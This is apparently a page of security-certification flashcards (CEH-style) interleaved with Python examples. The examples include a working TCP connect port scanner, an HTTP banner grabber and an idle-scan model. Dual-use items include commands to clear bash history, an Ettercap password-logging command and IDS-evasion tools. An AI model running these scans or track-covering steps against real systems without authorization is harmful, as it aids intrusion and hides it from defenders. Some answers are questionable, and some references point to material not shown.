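A 400 reply is still a successful grab: the server rejected the bare request but identified itself in the process, which is exactly what the transcript shows.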

To disguise the attack signature for the purpose of evading a signature based IDS

What would you use the tool ADMutate for?

Intranet Zone

Which zone is a controlled zone with no heavy restrictions?

Internet DMZ

Which zone is controlled, providing a buffer between internal networks and the Internet?

Production Network Zone

Which zone is a restricted zone that strictly controls direct access from uncontrolled networks?

Management Network Zone

Which zone is a secured zone with strict policies?

Internet Zone

Which zone is uncontrolled, being outside the boundaries of the organization?

It continues to examine the packet after a match is found to identify any additional rules the packet might match.

When an IDS or IPS is examining a packet against an access control list and finds a traffic match, what action does the device take?
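The router-ACL card earlier on this page (first match wins, evaluation stops) and this IDS card (every rule is checked) describe two different matching semantics over the same kind of rule list. As an added example (not code from the page or from any product), the following Python evaluates one constructed rule set both ways, which also shows why rule order matters on a router and does not on a signature engine. Packet and rule fields are simplified placeholders.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                 # "permit"/"deny" on a router; "alert"/"log" on an IDS
    src: str = "0.0.0.0/0"
    dst: str = "0.0.0.0/0"
    proto: str = "any"
    dport: Optional[int] = None  # None matches any port

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and self.proto in ("any", p.proto)
                and self.dport in (None, p.dport))


def router_acl(rules: List[Rule], packet: Packet, default: str = "deny") -> Tuple[str, str]:
    """Router semantics: the first matching entry decides and evaluation stops.
    A packet matching no entry hits the implicit deny at the end of the list."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action, rule.name
    return default, "implicit-deny"


def ids_evaluate(rules: List[Rule], packet: Packet) -> List[Tuple[str, str]]:
    """IDS/IPS semantics: every rule is checked and every match fires, so a
    single packet can produce several alerts."""
    return [(rule.action, rule.name) for rule in rules if rule.matches(packet)]


# Constructed rule set: web to the DMZ is allowed, everything else to the DMZ is denied.
RULES = [
    Rule("allow-web", "permit", dst="192.0.2.0/24", proto="tcp", dport=80),
    Rule("deny-dmz", "deny", dst="192.0.2.0/24"),
]

if __name__ == "__main__":
    web = Packet("198.51.100.7", "192.0.2.10", "tcp", 80)
    print("router:", router_acl(RULES, web))
    print("ids   :", ids_evaluate(RULES, web))
    print("router, rules reversed:", router_acl(list(reversed(RULES)), web))
```

On the router the reversed list denies the web traffic because "deny-dmz" is now seen first; on the IDS the reversed list produces the same two hits in a different order, which is the behavioural difference the two cards are getting at.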

Closed Open

When doing an IDLE scan if the IPID increments by 1 then the port is ____. If the IPID increments by 2 then the port is _____.
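The three idle-scan step cards and this IPID card describe a protocol exchange among three parties. As an added example (not code from the page or from Nmap), the following Python models the zombie's global IPID counter, the target's reply to a SYN carrying the zombie's address, and the scanner's two probes, so the "+1 = closed, +2 = open" rule can be seen to fall out of the exchange. It goes slightly beyond the cards in two ways a practitioner needs: a filtered port (no reply) is indistinguishable from a closed one, and a zombie that sends its own traffic between the probes makes the result indeterminate. Hosts, ports and counter values are constructed placeholders.

```python
class Zombie:
    """An idle host whose IP ID counter increases by one for every packet it
    sends, the property that makes it usable as an idle-scan zombie."""

    def __init__(self, start_ipid: int = 1000, background_traffic: int = 0):
        self.ipid = start_ipid
        self.background_traffic = background_traffic   # packets it sends between probes

    def _send(self) -> int:
        self.ipid = (self.ipid + 1) & 0xFFFF
        return self.ipid

    def receive(self, segment: str):
        """Unsolicited SYN/ACK -> reply RST, disclosing the IPID.
        Unsolicited RST -> silently dropped, nothing sent."""
        if segment == "SYN/ACK":
            return ("RST", self._send())
        return None

    def idle(self) -> None:
        for _ in range(self.background_traffic):
            self._send()


class Target:
    def __init__(self, open_ports, filtered_ports=()):
        self.open_ports = set(open_ports)
        self.filtered_ports = set(filtered_ports)

    def receive_syn(self, port: int):
        if port in self.filtered_ports:
            return None                     # dropped by a firewall: no reply at all
        return "SYN/ACK" if port in self.open_ports else "RST"


def probe_ipid(zombie: Zombie) -> int:
    """Step 1 / step 3: send SYN/ACK to the zombie and read the IPID off its RST."""
    return zombie.receive("SYN/ACK")[1]


def idle_scan(zombie: Zombie, target: Target, port: int) -> str:
    ipid_before = probe_ipid(zombie)
    zombie.idle()
    reply = target.receive_syn(port)        # step 2: SYN spoofed from the zombie's address
    if reply is not None:
        zombie.receive(reply)               # SYN/ACK -> zombie sends RST (+1); RST -> nothing
    zombie.idle()
    ipid_after = probe_ipid(zombie)
    delta = (ipid_after - ipid_before) & 0xFFFF
    if delta == 2:
        return "open"
    if delta == 1:
        return "closed|filtered"
    return "indeterminate (zombie not idle)"


if __name__ == "__main__":
    target = Target(open_ports={80}, filtered_ports={443})
    for port in (80, 22, 443):
        print(port, idle_scan(Zombie(), target, port))
    print(80, idle_scan(Zombie(background_traffic=3), target, 80))
```

Nmap's real implementation sends several probes and uses the same arithmetic; the point of the model is that the scanner never hears from the target directly, which is why the target's logs show only the zombie's address.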

Employee details, organization's website, company directory, location details, address and phone numbers, comments in HTML source code, security policies implemented, web server links relevant to the organization, background of the organization, news articles, press releases

When footprinting what organization's information is collected?

User and group names, system banners, routing tables, SNMP information, system architecture, remote system type, system names, passwords

When footprinting what system information is collected?

Domain name, internal domain names, network blocks, IP addresses of the reachable systems, rogue websites/private websites, TCP and UDP services running, access control mechanisms and ACLs, networking protocols, VPN points, IDSes running, analog/digital telephone numbers, authentication mechanisms, system enumeration

When footprinting what type of Network information is collected?

B)Ignore the risk

When handling residual risk, which of the following is NOT an acceptable approach? A)Apply additional controls B)Ignore the risk C)Transfer the risk D)Accept the risk

spoofed address attacker's real address

When someone uses IP spoofing, the victim replies to the address, it goes back to the _____ and not to the _____

Keywords

When talking to a victim, using ____ can make an attack easier.

SNMP GET SNMP SET

When the SNMP management station asks a device for information, the packet is known as an ____. When it asks the agent to make a configuration change, the request is an ____ request.

D)Encrypt with the server's public key

When the client is creating a session key for an SSL connection, how does the client handle the resulting key? A)Encrypt with the client's public key B)Encrypt with the server's private key C)Encrypt with the client's private key D)Encrypt with the server's public key

D)Scanned port is not filtered

When you are performing ACK flag scanning, what does it mean if you receive a response of RST? A)Scanned port is open B)Scanned port is closed C)Scanned port is filtered D)Scanned port is not filtered

C:\Windows\System32\Config\SAM

Where are the passwords for the SIDs and RIDs located on Windows machines?

Market Watch; The Wall Street Transcript; Lipper Marketplace; Euromonitor; Experian; SEC Info; The Search Monitor

Where can you go to find: What are the company's plans? to use for competitive intelligence.

ABI/INFORM Global; Compete Pro; AttentionMeter; Copernic Tracker; Jobitorial; SEMRush

Where can you go to find: What expert opinions say about the company? to use for competitive intelligence.

EDGAR Database; Hoovers; LexisNexis; Business Wire

Where can you go to find: When did this company begin? How did it develop? to use for competitive intelligence.

D) c:\windows\system32\config\

Where is the SAM file located in Windows 7? A) c:\system32\ B) c:\system32\config\ C) c:\windows\system32\ D) c:\windows\system32\config\

C. EIP

Which CPU register points to the next command the CPU should execute? A. TDM B. NIL C. EIP D. EDI E. EBP

Protection profile

Which Common Criteria component defines a standard set of security requirements for a specific type of product?

Evaluation Assurance Level (EAL)

Which Common Criteria component defines how thoroughly the product is tested?

D) NS

Which DNS record type indicates the organization's DNS servers dedicated to answering requests? A) PTR B) SOA C) MX D) NS

C) MX

Which DNS record type indicates the organization's e-mail server? A) PTR B) SOA C) MX D) DX

C. A

Which DNS record type maps a hostname to an IPv4 address and is used most often for DNS lookups? A. NS B. MX C. A D. SOA

Land

Which DoS attack sends traffic to the target with a spoofed IP of the target itself? Land Smurf Teardrop SYN flood

D. allintitle:SQL version

Which Google hack would display all pages that have the words SQL and Version in their title? A. inurl:SQL inurl:version B. allinurl:SQL version C. intitle:SQL inurl:version D. allintitle:SQL version

Type 11

Which ICMP message type/code indicates the packet could not arrive at the recipient due to exceeding its time to live? A. Type 11 B. Type 3, Code 1 C. Type 0 D. Type 8

C)Session reconstruction

Which IDS technique helps to mitigate session splicing attacks? A)Expression matching B)Session fragmentation C)Session reconstruction D)Whitelisting

802.2

Which IEEE standard describes Logical Link Control (LLC)?

802.1Q

Which IEEE standard describes VLAN encapsulation?

802.11

Which IEEE standard describes Wireless Fidelity (WiFi)?

802.1X

Which IEEE standard describes authentication?

127.0.0.1 or the loopback address

Which IP address does a computer use to refer to itself?

B)27006

Which ISO 27000 standard describes audits and certifications? A)27001 B)27006 C)27002 D)27005

showmount

Which Linux enumeration command displays all the shared directories on the machine

rpcinfo, rpcclient

Which Linux enumeration command provides information on RPC in the environment.

finger

Which Linux enumeration command provides information on the user and host machine?

-sO

Which Nmap switch includes protocols in the output?

-sT

Which Nmap switch performs a normal connect scan?

-sS

Which Nmap switch performs a normal stealth scan?

-sP (ping scan; the same option is spelled -sn in current Nmap releases)

Which Nmap switch performs a ping scan?

-sX

Which Nmap switch performs an inverse Xmas scan?

B) FIN

Which TCP flag brings communications to an orderly close? A) ACK B) FIN C) PSH D) SYN E) RST

B. PSH

Which TCP flag instructs the recipient to ignore buffering constraints and immediately send all data? A. URG B. PSH C. RST D. BUF

cacls.exe (superseded by icacls.exe on current Windows versions)

Which Windows command line tool can be used to assign, display, or modify ACLs (Access Control Lists) to files or folders?

ip.src == 192.168.1.1 (note that ip.addr == 192.168.1.1 matches packets to or from that host, not only those from it)

Which Wireshark filter displays only traffic from 192.168.1.1?

Diffie-Hellman

Which key-exchange algorithm lets two parties derive a shared secret key by exchanging only public values over an insecure channel? (Neither party's private exponent is ever transmitted.)

DNS poisoning

Which attack is based on changing the IP address to host name mapping?

C)TCP session hijacking

Which attack occurs at the Transport layer of the OSI model? A)ICMP flooding B)Telnet DoS attack C)TCP session hijacking D)MAC spoofing

DDoS attacks

Which attack uses a multitude of infected computers known as zombies or bots?

D)Trojan malware

Which attack vector commonly uses covert channels? A)Spear phishing B)SQL injection C)Network sniffing D)Trojan malware

Replay attacks

Which attacks can be mitigated by time stamps and nonce?

A) CACLS.exe

Which command can be used to assign, display, or modify the file and folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe

A. ./snort -dev -l ./log

Which command puts Snort into packet logger mode? A. ./snort -dev -l ./log B. ./snort -v C. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf D. None of the above

Switched Port Analyzer (SPAN) feature

Which configuration on a switch sends all traffic to the port on which the IDS is located?

D)Circuit level gateway

Which device normally operates at Layer 5 of the OSI model? A)Packet filtering firewall B)Proxy server C)Switch D)Circuit level gateway

C)Firewalls

Which device uses rule-based access control? A)Servers B)Clients C)Firewalls D)Switches

NTFS

Which file system is susceptible to an attack that uses alternative data streams?

C) tcp.flags==0x12 (SYN = 0x02 plus ACK = 0x10; 0x18 would match PSH/ACK)

Which filter should be used to show all SYN/ACK packets? A) tcp.flags==0x02 B) tcp.flags==0x18 C) tcp.flags==0x12 D) tcp.flags==0x10

D) Traceroute

Which footprinting tool uses ICMP to provide information on pathways between senders and recipients? A) Whois B) EDGAR C) NMAP D) Traceroute

The impact on performance

Which impact needs to be considered before implementing a security audit?

Common Criteria

Which international standard establishes a baseline of confidence in the security functionality of IT products, and includes protection profiles and evaluation assurance levels?

23

Which is the port number used for Telnet?

C)Does not require managing server services

Which is true of PGP? A)Requires a licensing fee B)Provides a server-side scripting language C)Does not require managing server services D)Provides only privacy for data

A virus is malware A virus replicates with user interaction

Which is/are a characteristic of a virus?

Client's private key

Which key is required to decrypt a message encrypted by a client's public key?

Server's public key

Which key is required to decrypt a message that was encrypted with a server's private key?

Grey hat

Which kind of hacker believes in full disclosure, with or without permission?

White hat

Which kind of hacker hacks with permission?

Black hat

Which kind of hacker hacks without permission?

A)Single factor authentication (a retina scan and a fingerprint scan are both "something you are", so together they still count as one factor)

Which kind of security mechanism would require a retina scan and a fingerprint scan as logon credentials? A)Single factor authentication B)Multi-factor authentication C)Two-factor authentication D)Biometric authorization

C)FC-0 D)FC-1

Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.) A)FC-4 B)FC-3 C)FC-0 D)FC-1 E)FC-2

Switch

Which network device can block sniffing to a single network collision domain, create VLANs, and make use of SPAN ports and port mirroring?

D. TOE

Which of the following Common Criteria processes refers to the system or product being tested? A. ST B. PP C. EAL D. TOE

B)Hidden SSID E)MAC address filters

Which of the following WLAN security measures could be easily defeated with the use of a wireless sniffer? (Choose all that apply.) A)802.11i B)Hidden SSID C)EAP-TTLS D)WPA2 Enterprise E)MAC address filters

C) ip.addr=192.168.0.100 and tcp.flags.syn

Which of the following Wireshark filters is valid for three way handshake details originating from 192.168.0.100? A) ip==192.168.0.100 and tcp.syn B) ip.addr=192.168.0.100 and syn=1 C) ip.addr=192.168.0.100 and tcp.flags.syn D) ip.equals 192.168.0.100 and syn.equals on

A) Detach from the console and log all collected passwords to a file

Which of the following accurately describes the intent of the command Ettercap -NCLzs --quiet A) Detach from the console and log all collected passwords to a file B) Provide a list of all hosts on the subnet C) Begin a ping sweep D) Provide a list of all listening ports and who is connected to your machine

D)Notifies of threats based on active attack signatures

Which of the following action does vulnerability scanning NOT perform? A)Scans for open ports and running services B)Utilizes automated processes to gather information C)Operates proactively to locate issues D)Notifies of threats based on active attack signatures

B)Sending FTP traffic through a firewall that blocks ports 20 and 21

Which of the following actions becomes possible using HTTP tunneling? A)Determining the open ports on server B)Sending FTP traffic through a firewall that blocks ports 20 and 21 C)Identifying a hidden SSID D)Stealing a secure cookie from a web session

Netcraft (Banner Grabbing)

Reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site

This flag is set during initial communication

SYN (Synchronize)

Port is closed (Stealth Scan [Half-open scan])

SYN --> <-- RST

Scan result when a port is closed (TCP Connect / Full Open Scan)

SYN --> <-- RST

Port is open (Stealth Scan [Half-open scan])

SYN --> <-- SYN + ACK RST -->

TCP Session Establishment (Three-way Handshake)

SYN --> <-- SYN+ACK ACK -->
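The exchanges in the cards above are what a connect scan (nmap -sT) drives one port at a time, and the way connect() ends tells you the port state. The script below is an added example, not code from the original page: it classifies a port as open (handshake completed), closed (immediate RST, seen as ECONNREFUSED) or filtered (no answer before the timeout), and includes a throwaway listener on 127.0.0.1 so the scan can be tried without a real target. The function names are my own.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one port the way a full-open (connect) scan does."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))                  # SYN -> SYN/ACK -> ACK completed
        return "open"
    except ConnectionRefusedError:               # SYN -> RST
        return "closed"
    except (socket.timeout, TimeoutError):       # no reply before timeout: dropped
        return "filtered"
    except OSError as exc:                       # e.g. host or network unreachable
        return f"error:{exc.errno}"
    finally:
        s.close()                                # tear down with FIN or RST afterwards


def connect_scan(host: str, ports, timeout: float = 1.0, workers: int = 64) -> dict:
    """Scan `ports` on `host` in parallel and return {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def loopback_listener() -> socket.socket:
    """Throwaway listener on an ephemeral 127.0.0.1 port: an 'open' port for the demo."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def unused_loopback_port() -> int:
    """Pick a 127.0.0.1 port nothing listens on: a 'closed' port for the demo."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    srv = loopback_listener()
    open_port, closed_port = srv.getsockname()[1], unused_loopback_port()
    for port, state in connect_scan("127.0.0.1", [open_port, closed_port]).items():
        print(f"127.0.0.1:{port} {state}")
    srv.close()
```

Because connect() completes the three-way handshake, every open port produces a full connection that the target's application and logs will see; that is why the page rates the full-connect scan as the most reliable and the most likely to be noticed.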

IDLE Scan: Step 2 (Port Open)

attacker --> target: SYN to port 80 with the source address spoofed as the zombie; target --> zombie: SYN+ACK; zombie --> target: RST (IPID=31338)

B. Assessment

Sally is a member of a pen test team newly hired to test a bank's security. She begins searching for IP addresses the bank may own by searching public records on the Internet. She also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is Sally working? A. Preparation B. Assessment C. Conclusion D. Reconnaissance

C) Hybrid attacks use a word list, substituting numbers and symbols in common places

Which of the following best describes a hybrid attack? A) Hybrid attacks make use of rainbow tables and a word list B) Hybrid attacks make use of two or more password cracking tools C) Hybrid attacks use a word list, substituting numbers and symbols in common places D) Hybrid attacks use two or more unedited word lists

B)Vulnerability

Which of the following best describes a weakness or error that can lead to a security compromise? A)Threat B)Vulnerability C)Threat agent D)Threat vector

Code designed to be run on the server

Which of the following best describes a web application?

B. BIA (Business Impact Analysis)

Which of the following best describes an effort to identify systems that are critical for continuation of operation for the organization? A. BCP B. BIA C. MTD D. DRP

A. It has few heavy security restrictions.

Which of the following best describes an intranet zone? A. It has few heavy security restrictions. B. A highly secured zone, usually employing VLANs and encrypted communication channels. C. A controlled buffer network between public and private. D. A very restricted zone with no users.

D) Intercepting traffic (MITM)

Which of the following best describes the purpose of the tool hunt? A) Footprinting B) Web application attack tool C) Vulnerability scanner D) Intercepting traffic (MITM)

A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources

Which of the following is a passive footprinting method? (Choose all that apply.) A. Checking DNS replies for network mapping purposes B. Collecting information through publicly accessible sources C. Performing a ping sweep against the network range D. Sniffing network traffic through a network tap

A)Self-signed certificates

You need to exchange confidential information with a trusted partner. The partner indicates to you that he will issue certificates. These certificates are signed by the same entity that verifies the certificate's identity. Which term is used for the type of certificate issued by the partner? A)Self-signed certificates B)Online certificates C)Signed certificates D)X.509 certificates

C)Ecora Auditor Professional

You need to perform a thorough audit of your company's infrastructure configuration. The proposed security policy will require detailed vulnerability assessment and compliance with industry-accepted best practices, including SOX and PCI. Enterprise assessments, reporting, and patch management must be centralized. Which tool will BEST meet these requirements? A)Tenable Nessus Professional B)Active Network Security (Hping) C)Ecora Auditor Professional D)Network Mapper (Nmap)

C)Vulnerability assessment

You need to perform the following tasks: -Identify all resources on a target system. -Identify the potential threats to each resource on the system. -Determine a mitigation strategy to handle serious and likely threats. What is the name of this process? A)Social engineering B)System scanning C)Vulnerability assessment D)Penetration test

A. tcpdump -i eth0 -w my.log

You need to put the NIC into listening mode on your Linux box, capture packets, and write the results to a log file name my.log. How do you accomplish this with tcpdump? A. tcpdump -i eth0 -w my.log B. tcpdump -l eth0 -c my.log C. tcpdump /i eth0 /w my.log D. tcpdump /l eth0 /c my.log

D)Enable WPA on the WAP

You need to secure a wireless local area network (WLAN) without significantly reducing throughput or limiting the supported devices. Which implementation should provide the highest level of security? A)Create a VPN using OpenVPN B)Create a VPN using PPTP C)Enable WEP on the WAP D)Enable WPA on the WAP

C)PGP

You need to send an encrypted message to another user. Both you and the recipient have private and public keys. As the sender, you must obtain the recipient's public key to send the message. Which cryptographic technology are you most likely using? A)3DES B)SHA-1 C)PGP D)RC4

D) 222.173.190.239

You receive a suspicious email and note the URL is pointing to 0xDE.0xAD.0xBE.0xEF. If you enter the command ping 0xDE.0xAD.0xBE.0xEF, which IP address will resolve? A) 233.44.245.15 B) 222.87.57.238 C) 199.233.87.45 D) 222.173.190.239
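Hex octets are only one of the obfuscated spellings phishers use so that a URL does not look like an IP address; ping and browsers also accept octal octets, a single 32-bit decimal number, and fewer than four parts. The parser below is an added example (not code from the original page) that applies those inet_aton rules and returns the plain dotted-decimal form; the sample inputs are constructed and the function names are my own.

```python
import ipaddress


def _octet_part(part: str) -> int:
    """Parse one dotted part as hex (0x..), octal (leading 0) or decimal."""
    p = part.lower()
    if p.startswith("0x"):
        return int(p[2:], 16)
    if len(p) > 1 and p.startswith("0"):
        return int(p, 8)
    return int(p, 10)


def deobfuscate_ip(text: str) -> str:
    """Return the dotted-decimal form of an obfuscated IPv4 literal.

    Follows the inet_aton() rules that ping and most browsers use: one to
    four parts, each hex, octal or decimal; the final part fills every octet
    not covered by the parts before it (a.b.c.d, a.b.cd, a.bcd, or abcd).
    """
    parts = [_octet_part(p) for p in text.strip().split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError("expected between 1 and 4 dotted parts")
    *head, tail = parts
    tail_bits = 8 * (4 - len(head))
    if any(not 0 <= h <= 0xFF for h in head) or not 0 <= tail < (1 << tail_bits):
        raise ValueError("part out of range")
    value = 0
    for h in head:
        value = (value << 8) | h
    value = (value << tail_bits) | tail
    return str(ipaddress.IPv4Address(value))


# Constructed samples: all four spellings name the same host.
SAMPLES = [
    "0xDE.0xAD.0xBE.0xEF",   # hex octets, as in the question
    "3735928559",            # single 32-bit decimal ("dword") form
    "0336.0255.0276.0357",   # octal octets
    "222.173.48879",         # three parts: the last part carries 16 bits
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s:24} -> {deobfuscate_ip(s)}")
```

A mail or proxy filter that only pattern-matches dotted-decimal addresses misses every one of these forms, which is why normalising the host before any blocklist lookup matters.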

Active banner grabbing Passive banner grabbing

______ involves sending specially crafted packets to remote systems and comparing responses to determine the OS. _____ involves reading error messages, sniffing network traffic, or looking at page extensions.

tiger team

a group of people, gathered together by a business entity, working to address a specific problem or goal.

Health Insurance Portability and Accountability Act (HIPAA)

addresses privacy standards with regard to medical information.

ARP Table

is a list of IP addresses and corresponding MAC addresses stored on a local computer

NetworkView

is a network discovery and management tool for Windows

Email tracking

is used to monitor the delivery of emails to an intended recipient

Scanning an entire subnet

nmap 192.168.1.0/24

Scan a single IP

nmap 192.168.1.100

GFI LanGuard

offers quality vulnerability and compliance scanning, as well as built-in patch management.

Well-known ports

port numbers 0 - 1023

XMAS scan

-sX

sniff traffic

A remote Trojan would be used to do all of the following except ___.

D. Open ports do not respond at all.

A team member runs an Inverse TCP scan. What is the expected return for an open port? A. Open ports respond with a SYN/ACK. B. Open ports respond with a RST. C. Open ports respond with a FIN. D. Open ports do not respond at all.

Script Kiddies

An unskilled hacker who compromises system by running scripts, tools, and software developed by real hackers

A network ID

192.168.5.0/24 is an example of which kind of reserved IP address? (192.168.5.1 would be an ordinary host address in that network, not a reserved one.)

A broadcast address

192.168.6.255/24 is an example of which kind of reserved IP address?

IPv6 loopback address

::1

collision domain

A domain composed of all the systems sharing any given physical transport media. Systems may collide with each other during the transmission of data.

B. LOCAL_System

A hacker successfully completes a buffer overflow attack on a default IIS installation running on an older Windows 2000 machine spawning a command shell, what privileges is the attack most likely now running with? A. Local administrator B. LOCAL_System C. IUSR_SYSTEMNAME D. Guest

buffer

A portion of memory used to temporarily store output or input data.

Computer Emergency Response Team (CERT)

Name given to expert groups that handle computer security incidents.

the design of the modern processor chips

Spectre and Meltdown are vulnerabilities found in ___ from AMD, ARM, and Intel

ACK (Acknowledgement)

TCP Flag, Acknowledges the receipt of a packet

URG (Urgent)

TCP Flag, Data contained in the packet should be processed immediately

RST (Reset)

TCP Flag, Resets a connection

PSH (Push)

TCP Flag, Sends all buffered data immediately

FIN (Finish)

TCP Flag, There will be no more transmissions

Telnet

This technique probes HTTP servers to determine the Server field in the HTTP response header
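The telnet technique above amounts to typing a HEAD request by hand and reading the Server header off the reply. The script below is an added example, not code from the original page: it builds that request, parses the response headers, and reports the banner, with the live socket call kept separate so the parser can be exercised on a constructed reply. Function names and the sample response are my own.

```python
import socket


def build_head_request(host: str) -> bytes:
    """The request the card describes typing by hand over telnet."""
    # HTTP/1.0 so the server answers once and closes the connection
    return f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def parse_response_headers(raw: bytes) -> dict:
    """Split a raw HTTP response into {'_status': line, header: value, ...}."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {"_status": lines[0]}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def server_banner(raw: bytes) -> str:
    """The Server header, or '<none>' when the site suppresses it."""
    return parse_response_headers(raw).get("server", "<none>")


def grab_banner(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Connect, send HEAD, read until the header block ends, return the banner."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_head_request(host))
        while b"\r\n\r\n" not in buf:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return server_banner(buf)


# Constructed reply, not captured from any real server.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Server: Apache/2.4.41 (Ubuntu)\r\n"
    b"X-Powered-By: PHP/7.4.3\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(server_banner(SAMPLE_RESPONSE))
    # Live use (needs network): print(grab_banner("example.com"))
```

X-Powered-By is worth collecting alongside Server: it often names the application runtime even when the Server header has been trimmed.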

80 (ports 81 and 8080 are also common on development servers)

Which port number is commonly used for HTTP?

D. 514

Which port number is used by default for syslog? A. 21 B. 23 C. 69 D. 514

53

Which port number is used for DNS?

21

Which port number is used for FTP?

None. ICMP is an IP-layer protocol (IP protocol number 1) and has no port numbers; it is defined in RFC 792, which is where the number 792 comes from.

Which port number is used for ICMP?

137, 138, 139 (NetBIOS over TCP/IP) and 445 (direct-hosted SMB)

Which port numbers are used for SMB?

161 and 162

Which port numbers are used for SNMP?

A. Full-connect

Which port-scanning method presents the most risk of discovery but provides the most reliable results? A. Full-connect B. Half-open C. Null scan D. XMAS scan

A)Gaining permission from concerned authorities

Which preliminary activity differentiates a penetration test performed by a white hat hacker and a gray hat hacker? A)Gaining permission from concerned authorities B)Gaining covert authorization from the government C)Gathering information without direct interaction with targets D)Gathering information from targets by any possible means

ipfwadm

Which program controls the packet filtering or firewall capabilities in Linux kernel versions 1.2.x and 2.0.x?

iptables

Which program replaced ipchains in Linux 2.4x?

ipchains

Which program replaced ipfwadm in Linux 2.2x?

Address Resolution Protocol (ARP)

Which protocol maps IP addresses to MAC addresses?

D) SMB

Which protocol usually listens on ports in the 137 to 139 range? A) Telnet B) Kerberos C) SNMP D) SMB

database

An organized collection of data.

web-based script

A Web shell is a ___ that allows access to a web server

history -c (clear the in-memory history list), then history -w (write the now-empty list over ~/.bash_history)

BASH Clearing the history

CNAME

Canonical naming allows aliases to a host

Contact e-mail

E-mail address of the person responsible for the zone file.

[location:]

Find information for a specific location

PTR

Map IP address to a hostname

UDP 137

NetBIOS Name Service (NBNS)

Promiscuous Policy

No restriction on usage of system resources

Proxy Browser for Android; ProxyDroid; NetShade

Proxy Tools for Mobile

ICMP Type 11 Code 0

The packet took too long to be routed to the destination: its TTL expired in transit

Auditing

The process of recording activity on a system for monitoring and later review.

TXT

Unstructured text records

Validate an email address

VRFY is used to do which of the following?

Layer 5 Session

X.225, SCP, ZIP, Etc. resides at what layer of the OSI model?

B) ICMP D) Nothing

A UDP scan can produce which two possible responses? (Choose Two) A) RST B) ICMP C) ACK D) Nothing

figure out the vulnerabilities the system posses carry out additional attacks

(Banner Grabbing) Identifying the OS used on the target host allows an attacker to ____ and the exploits that might work on the system to further ____.

Exploit

A breach of IT system security through vulnerabilities

UDP Port Closed

-If a UDP packet is sent to a closed port, the system responds with an ICMP port unreachable message (Type 3, Code 3) -Spyware, Trojan horses, and other malicious applications use UDP ports

ICMP ping

-PI (ICMP echo request ping; spelled -PE in current Nmap)

No ping

-P0 (zero: skip host discovery and scan every target as if it were up; spelled -Pn in current Nmap)

Serial, slowest scan

-T0 (paranoid), -T1 (sneaky)

UDP Port Open

-There is no three-way TCP handshake for UDP scan -The system does not respond with a message when the port is open

ACK scan

-sA

FIN scan

-sF

IDLE scan

-sI

SYN scan

-sS

TCP connect scan

-sT

asynchronous

1. The lack of clocking (imposed time ordering) on a bit stream. 2. An industry term referring to an implant or malware that does not require active interaction from the attacker.

RAT

A Trojan can include which of the following? A) RAT B) TCP C) Nmap D) Loki

Social engineering

A Trojan relies on ___ to be activated.

An SDK

A covert channel or backdoor may be detected using all of the following except ___. A) Nmap B) Sniffers C) An SDK D) Netcat

bit flipping

A cryptographic attack where bits are manipulated in the cipher text to generate a predictable outcome in the plain text once it is decrypted
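Bit flipping works against any cipher that offers confidentiality without integrity: with a stream cipher (and with the block following a modified block in CBC) a flipped ciphertext bit flips the same plaintext bit on decryption. The code below is an added example, not from the original page: a toy XOR keystream cipher, the field rewrite an attacker performs without the key, and the encrypt-then-MAC check that stops it. Keys, nonce and message are constructed for the demo and the function names are my own.

```python
import hashlib
import hmac


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: SHA-256(key || nonce || counter) blocks (demo only)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt and decrypt are the same XOR; there is no integrity protection."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def flip_field(ciphertext: bytes, known: bytes, wanted: bytes, offset: int) -> bytes:
    """Make the bytes at `offset` decrypt to `wanted` instead of `known`.

    Because C = P xor K, C xor (known xor wanted) decrypts to
    P xor known xor wanted, which equals `wanted` at those positions.
    No key is needed, only the field's position and current value.
    """
    if len(known) != len(wanted):
        raise ValueError("replacement must be the same length")
    ct = bytearray(ciphertext)
    for i, (old, new) in enumerate(zip(known, wanted)):
        ct[offset + i] ^= old ^ new
    return bytes(ct)


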